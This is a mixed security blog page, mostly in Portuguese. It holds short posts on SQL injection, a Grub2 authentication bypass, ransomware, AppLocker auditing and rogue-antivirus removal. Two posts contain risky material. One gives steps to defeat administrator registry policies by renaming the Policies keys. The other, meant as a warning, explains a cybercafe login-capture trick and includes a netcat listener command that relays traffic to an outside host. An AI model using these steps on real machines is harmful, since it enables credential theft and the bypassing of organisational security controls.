SQL Injection a little to fear

Article in English
A little about SQL Injection. To know more about this method

SQLi

SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
Continue reading

Como invadir o Grub2 no Linux apenas com o Backspace ?

Os engenheiros Hector Marco e Ismael Ripoll do grupo de cybersegurança da universidade de Valencia descobriram um exploit que pode ser aplicado nas versão 1.98 do Grub2 que quando adicionado uma senha da inicialização e pressionado o backspace 28 vezes sequêncialmente no prompt do username o shell de recuperação é liberado e o usuário pode instalar um rootkit ou malware no sistema. A Canonical, Red Hat e Debian já disponibilizaram em seus sites as correções para este bug.

Veja na integra:
http://hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html#exploit

Análise de Ransomware

Muitas ameças do tipo Ransomware têm surgido ao redor do mundo. Muitas empresas tem passado por sequestros de dados por este tipo de software. A maioria dos fabricantes de antívirus são capazes de alertar a respeito deste tipo de ameaça.

Na maioria dos casos o ataque começa com o recebimento de um e-mail contendo um software que tem como objetivo encriptar os arquivos.
Continue reading

Habilitando REGEDIT pelo GPEDIT

Contribuição: Bruno Camper

Habilitando REGEDIT pelo GPEDIT.MSC quando as opções de proxy estão bloqueadas
Primeiramente vamos habilitar o REGEDIT.
1º) Iniciar > Executar > gpedit.msc > Configurações de Usuario > Modelos Administrativos > Sistema.
Do lado direito clique em: Impedir Acesso a Ferramentas de Edição de Registro (Configure para DESATIVADO).
2° Tente efetuar o procedimento abaixo para redefinir as políticas de segurança.
Acesse “Iniciar”, “Todos os Programas”, “Acessórios”, “Executar”. Digite regedit e pressione enter.
Localize as seguintes chaves e altere seus nomes, acrescentando .old ao final de cada um.
HKEY_CURRENT_USER\Software\Policies para Policies.old
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies para Policies.old
HKEY_LOCAL_MACHINE\SOFTWARE\Policies para Policies.old
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies para Policies.old
Reinicie o Windows e verifique o resultado.

Auditando e restringindo aplicativos no Windows

Este post mostra como auditar e restringir aplicativos no Windows para criar ambientes um pouco mais seguros.

Artigo em inglês
Updated: June 27, 2012
Applies To: Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012
The Audit only enforcement setting helps you determine which applications are used in an organization. When the AppLocker policy for a rule collection is set to Audit only, rules for that rule collection are not enforced. When a user runs an application that would have been affected by an AppLocker rule, information about that application is added to the AppLocker event log.
noteNote
This scenario assumes that you completed Automatically Generating Executable Rules from a Reference Computer. However, you can complete the procedures in this scenario to test any rules that you already defined on the reference computer. If you are working with a predefined AppLocker rule set, ensure that the default rules were created.
If you did not create the default rules and are prevented from performing administrative tasks, restart the computer in Safe Mode, add the default rules, delete any deny rules that are preventing access, and then restart the computer in normal mode.
This scenario includes the following steps:
Step 1: Configure the audit enforcement setting

Step 2: Start the Application Identity service

Step 3: Refresh Group Policy settings on the computer

Step 4: Review the AppLocker log in Event Viewer

Step 1: Configure the audit enforcement setting
There are three AppLocker enforcement modes. When AppLocker policies are merged, both the rules and the enforcement modes are merged. The closest GPO setting is used for the enforcement mode while all rules from linked GPOs are applied, except for the Not configured setting, which is overwritten by any other linked setting.
The following table details the enforcement modes.

Enforcement mode Description
Not configured
Default. If linked GPOs contain a different setting, that setting is used. Otherwise, if any rules are present in the corresponding rule collection, they are enforced.
Enforce rules
Rules are enforced.
Audit only
Rules are audited but not enforced.
Before turning on rule enforcement, test the rules first by using the Audit only enforcement setting.
To configure the enforcement setting for the Executable Rules collection to Audit only
To open the Local Security Policy MMC snap-in, click Start, type secpol.msc, and then press ENTER.
In the console tree, double-click Application Control Policies, and then double-click AppLocker.
In the details pane, scroll down to the Configure Rule Enforcement heading, and then click Configure rule enforcement.
In the AppLocker Properties dialog box, under Executable Rules, click Audit only, and then click OK.
After creating the default rules and enabling the auditing mode, deploy the test policy to test the GPO and determine which applications are being used.
Step 2: Start the Application Identity service
The Application Identity service performs all of the rule conversion for the AppLocker policy. For AppLocker policy to be evaluated on a computer, the Application Identity service must be started.
To start the Application Identity service
Click Start, type services.msc , and then press ENTER.
In the Services snap-in console, right-click Application Identity, and then click Properties.
On the Start type menu, click Automatic, and then click OK.
In the Services snap-in console, right-click Application Identity, and then click Start to start the service for the first time.
noteNote
Consider using Group Policy to start the service automatically on all computers where you plan to deploy AppLocker. For information about configuring Group Policies, see How to Configure Group Policies to Set Security for System Services.
Step 3: Refresh Group Policy settings on the computer
After you create new AppLocker rules, you must refresh the Group Policy settings on the computer to ensure that the AppLocker rules are applied.
To refresh Group Policy settings
At the command prompt, type gpupdate /force, and then press ENTER.
Wait for the messages confirming that the user and computer policies are updated, and then close the window.
Step 4: Review the AppLocker log in Event Viewer
The AppLocker log contains information about all of the applications that are affected by AppLocker rules. You can use the log to determine which applications are affected by a rule. Each event in the AppLocker operational log contains detailed information about:
Which file is affected and the path of that file.

Whether the file is allowed or blocked.

The rule type (path, file hash, or publisher).

The rule name.

The security identifier (SID) for the targeted user or group.

To review the AppLocker log in Event Viewer
Click Start, type eventvwr.msc, and then press ENTER.
In the Event Viewer console tree, double-click Application and Services Logs, double-click Microsoft, double-click Windows, double-click AppLocker, and then click EXE and DLL.
Review the entries in the results pane to determine if any applications are not included in the rules that you automatically generated. For instance, some line-of-business applications are installed to non-standard locations, such as the root of the active drive (C:\).
The following table describes the event levels that you may find in the log.
noteNote
New logs and new events have been added in Windows Server 2012 and Windows 8. For more information, see Using Event Viewer with AppLocker.

Event ID Event level Event text Description
8000
Error
Application Identity Policy conversion failed. Status <%1>
The policy was not applied correctly to the computer. The Status message is provided for troubleshooting purposes.
8001
Informational
The AppLocker policy was applied successfully to this computer.
The AppLocker policy was applied successfully to this computer.
8002
Informational
was allowed to run.
Specifies that the .exe or .dll file is allowed by an AppLocker rule.
8003
Warning
was allowed to run but would have been prevented from running if the AppLocker policy were enforced.
Specifies that the file would have been blocked if the Enforce rules enforcement mode were enabled. You see this event level only when the enforcement mode is set to Audit only.
8004
Error
was not allowed to run.
The file cannot run. You see this event level only when the enforcement mode is set directly or indirectly through Group Policy inheritance to Enforce rules.
8005
Information
was allowed to run.
Specifies that the .msi file or script is allowed by an AppLocker rule.
See Also
Concepts
AppLocker Step-by-Step Scenarios

Link de referência: http://technet.microsoft.com/en-us/library/dd723693(v=ws.10).aspx

Removendo malware System Care

Se você é usuário de Windows e está com dificuldades para removação do aplicativo System Care utilize a dica abaixo para remoção. O System Care não é um anti-vírus e sim um malware.

Abaixo você encontra a solução para este problema
http://malwaretips.com/blogs/system-care-antivirus-virus-removal/#malwarebytes

Artigo em inglês

System Care Antivirus Removal Guide

System Care Antivirus is a computer virus, which masquerades as genuine security software, while actually reporting non-existent malware threats in order to scare the user into paying for this rogue security software.
[Image: System Care Antivirus virus]

What is System Care Antivirus?

System Care Antivirus is a rogue anti-virus program from the Rogue.WinWebSec family of computer infections. This program is classified as a rogue because it pretends to be an anti-virus program, but will instead displays bogus scan results, report non-existing computer infections, and does not allow you to run your normal applications.
In this case, not only is System Care Antivirus going to disrupt your system, it’s going to try and trick you into making a purchase using your credit card.
System Care Antivirus appears in the form of a fake Windows warning on your computer system that reads you have a specific number of viruses on your computer (usually in the hundreds) and that this software has detected those viruses. To get rid of them you must purchase the full-version of System Care Antivirus. It’s important to remember that by purchasing the “claimed full version to remove the viruses” you will be submitting your personal information to unscrupulous persons and may also end up being a victim of credit card or identity fraud or theft.

How did System Care Antivirus got on my computer?

System Care Antivirus is distributed through several means. Malicious websites, or legitimate websites that have been hacked, can infect your machine through exploit kits that use vulnerabilities on your computer to install this rogue antivirus without your permission.
Another method used to propagate System Care Antivirus is spam email containing infected attachments or links to malicious websites. Cyber-criminals spam out an email, with forged header information, tricking you into believing that it is from a shipping company like DHL or FedEx. The email tells you that they tried to deliver a package to you, but failed for some reason. Sometimes the emails claim to be notifications of a shipment you have made. Either way, you can’t resist being curious as to what the email is referring to – and open the attached file (or click on a link embedded inside the email). And with that, your computer is infected with the System Care Antivirus virus.
The threat may also be downloaded manually by tricking the user into thinking they are installing a useful piece of software, for instance a bogus update for Adobe Flash Player or another piece of software.
The System Care Antivirus infection is also prevalent on peer-to-peer file sharing websites and is often packaged with pirated or illegally acquired software.

Am I infected with System Care Antivirus virus?

Some examples of the interface, fake alerts, fake scanning results, and pop-ups displayed by System Care Antivirus are shown below:

[Image: System Care Antivirus]

[Image: System Care Antivirus Warning]

[Image: System Care Antivirus scam]

Activation codes for System Care Antivirus

As an optional step,you can use any of the following license keys to register System Care Antivirus and stop the fake alerts.
System Care Antivirus Activation code: AA39754E-715219CE
Please keep in mind that entering the above registration code will NOT remove System Care Antivirus from your computer , instead it will just stop the fake alerts so that you’ll be able to complete our removal guide more easily.


How to remove System Care Antivirus virus

This page is a comprehensive guide, which will remove the System Care Antivirus infection from your your computer. Please perform all the steps in the correct order. If you have any questions or doubt at any point, STOP and ask for our assistance.
STEP 1: Start your computer in Safe Mode with Networking (OPTIONAL)
STEP 2: Remove System Care Antivirus virus with Malwarebytes Anti-Malware Free
STEP 3:  Remove System Care Antivirus infection with HitmanPro

STEP 1 : Start your computer in Safe Mode with Networking (OPTIONAL)

Some variants of the System Care Antivirus virus will not allow you to start some of the below utilities while running Windows in its regular state.
If this happens, we recommend that you start your computer in Safe Mode with Networking, and try from there to perform the below scan.
To start your computer Start your computer in Safe Mode with Networking, you can follow the below steps:

  1. Remove all floppy disks, CDs, and DVDs from your computer, and then restart your computer.
  2. When the computer starts you will see your computer’s hardware being listed. When you see this information start to gently tap the F8 key repeatedly until you are presented with the Windows XP, Vista or 7 Advanced Boot Options.
    [Image: F8 key]
    If you are using Windows 8, press the Windows key + C, and then click Settings. Click Power,hold down Shift on your keyboard and click Restart, then click on Troubleshoot and selectAdvanced options. In the Advanced Options screen, select Startup Settings, then click onRestart.
  3. If you are using Windows XP, Vista or 7 in the Advanced Boot Options screen, use the arrow keys to highlight Safe Mode with Networking , and then press ENTER.
    [Image: Safemode.jpg]\
    If you are using Windows 8, press 5  on your keyboard to Enable Safe Mode with Networking.
    Windows will start in Safe Mode with Networking.

STEP 2: Remove System Care Antivirus virus with Malwarebytes Anti-Malware FREE

The Malwarebytes Chameleon utility will allow us to install and run a scan with Malwarebytes Anti-Malware Free without being blocked by System Care Antivirus rootkit.

  1. Right click on your browser icon, and select Run As or Run as Administrator. This should allow your browser to open so that we can then download Malwarebytes Chameleon.
    [Image: Starting web browse on infected computer]
    If you’ll see a “Warning! The site you are trying visit may harm your computer!” message in your web browser window, you can safely click on the Ignore warnings and visit that site in the current state (not recommended) link, because this a bogus alert from System Care Antivirus.
  2. Download Malwarebytes Chameleon  from the below link, and extract it to a folder in a convenient location.
    MALWAREBYTES CHAMELEON DOWNLOAD LINK  (This link will open a new web page from where you can download Malwarebytes Chameleon)
    [Image: Extract Malwarebytes Chameleon utility]
  3. Make certain that your infected computer is connected to the internet and then open the Malwarebytes Chameleon folder, and double-click on the svchost.exe file.
    [Image: Double click  on svchost.exe]
    IF Malwarebytes Anti-Malware will not start, double-click on the other renamed files until you find one will work, which will be indicated by a black DOS/command prompt window.
  4. Follow the onscreen instructions to press a key to continue and Chameleon will proceed to download and install Malwarebytes Anti-Malware for you.
    Malwarebytes Chameleon press key
  5. Once it has done this, it will update Malwarebytes Anti-Malware, and you’ll need to click OK when it says that the database was updated successfully.
    Malwarebytes Chameleon updating its database
  6. Malwarebytes Anti-Malware will now attempt to kill all the malicious process associated with System Care Antivirus.Please keep in mind that this process can take up to 10 minutes, so please be patient.
    Malwarebytes Chameleon killing malware
  7. Next, Malwarebytes Anti-Malware will automatically open and perform a Quick scan for System Care Antivirus malicious files as shown below.
    [Image: Malwarebytes Anti-Malware scanning for System Care Antivirus]
  8. Upon completion of the scan, click on Show Result
    [Image: Malwarebytes Anti-Malware scan results]
  9. You will now be presented with a screen showing you the malware infections that Malwarebytes Anti-Malware has detected.
    Make sure that everything is Checked (ticked),then click on the Remove Selected button.
    [Image:Malwarebytes removing virus]
  10. After your computer will start in Windows regular mode, open Malwarebytes Anti-Malware and perform a Full System scan to verify that there are no remaining threats

STEP 3: Remove System Care Antivirus infection with HitmanPro

Some variants of the System Care Antivirus virus will install on victims computers a ZeroAccess rootkit. To remove this nasty piece of malware, we will perform a system scan with HitmanPro.
HitmanPro is a cloud on-demand scanner, which will scan your computer with 5 antivirus engines (Emsisoft, Bitdefender, Dr. Web, G-Data and Ikarus) for the System Care Antivirus infection.

  1. You can download HitmanPro from the below link:
    HITMANPRO DOWNLOAD LINK (This link will open a web page from where you can download HitmanPro)
  2. Double-click on the file named HitmanPro.exe (for 32-bit versions of Windows) orHitmanPro_x64.exe (for 64-bit versions of Windows). When the program starts you will be presented with the start screen as shown below.
    If you are experiencing problems while trying to start HitmanPro, you can use the Force Breach mode.To start HitmanPro in Force Breach mode, hold down the left CTRL key when you start HitmanPro and all non-essential programs are terminated, including the System Care Antivirus virus.

    When HitmanPro will start, click on the Next button, to install this program on your computer.
    HitmanPro scanner
  3. HitmanPro will now begin to scan your computer for System Care Antivirus trojan.
    HitmanPro detecting for System Care Antivirus virus
  4. When it has finished it will display a list of all the malware that the program found as shown in the image below. Click on the Next button, to remove System Care Antivirus virus.
    HitmanPro scan results
  5. Click on the Activate free license button to begin the free 30 days trial, and remove all the malicious files from your computer.
    [Image: HitmanPro 30 days activation button]

Your computer should now be free of the System Care Antivirus infection. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version ofMalwarebytes Anti-Malware to protect against these types of threats in the future, and perform regular computer scans with HitmanPro.
If you are still experiencing problems while trying to remove System Care Antivirus from your machine, please start a new thread in our Malware Removal Assistance forum.

O perigo de usar internet em Kiosques e Cybercafes

Este post têm como objetivo a instruir pessoas a não utilizar a internet logando em seus serviços de e-mails, redes sociais etc pois o risco é grande. Um usuário mal intencionado pode roubar suas informações sem sequer precisar de exploits, sniffers ou arp spoofing ele usará apenas o Netcat

A técnica mencionada aqui é simples, um usuário mal intencionado habilita em sua máquina para que escute de pacotes enviados pelo computador cobaia simulando a porta 80 ( HTTP ) e altero o formulário de login do serviço web para que mande esta solicitação para esta nova conexão alterando o source do HTML da página.

Quando um usuário entrar com o login e senha ele enviará automáticamente as informações para o computador do usuário mal intencionado

Entendendo:
nc -l 192.168.1.100 8080 –sh-exec “ncat sincronicx.com 80”

192.168.1.100 -> IP no qual irá escutar as conexões na porta 8080 simulando um servidor WEB

Entenda o funcionamento nos screenshots abaixo:
Screen Shot 2014-07-18 at 7.11.08 PM

Screen Shot 2014-07-18 at 7.11.42 PM